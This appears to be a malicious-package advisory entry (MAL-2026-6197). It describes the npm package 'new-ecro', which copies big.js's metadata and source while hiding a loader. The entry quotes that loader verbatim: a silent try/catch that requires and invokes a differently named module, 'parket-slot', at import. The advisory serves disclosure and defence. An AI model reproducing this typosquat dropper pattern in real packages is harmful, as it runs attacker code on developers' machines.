MAL-2026-6197

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7492a140547cea0957bc705d365e19806091462a249c3d5c90b6bfe91e8431c7) Package 'new-ecro' impersonates the legitimate 'big.js' library: it copies big.js's README, source, version banner ('big.js v7.0.1'), author email, and repository URL while being published under an unrelated name. On require()/import of the main entry, big.js:606-609 (and the same lines in big.mjs) execute `try { const doc = require("parket-slot"); doc.from_str().then(e=>{}).catch(e=>{}) } catch (error) {}` — a silent loader-and-invoker wrapped in an error-swallowing try/catch so failures are invisible to the caller. The package's declared dependency in package.json is `new-solt@0.0.8`, while the code requires `parket-slot` — a name mismatch that hides the actual executing module from casual inspection of new-ecro's manifest; new-solt transitively delivers parket-slot. A developer who installs new-ecro believing it is big.js, or whose dependency tree pulls it in, executes attacker-controlled third-party code at import time. The combination of metadata spoofing of a popular library, a silent runtime require of a different-named module than declared, and unconditional error suppression is a canonical malicious-typosquat dropper pattern.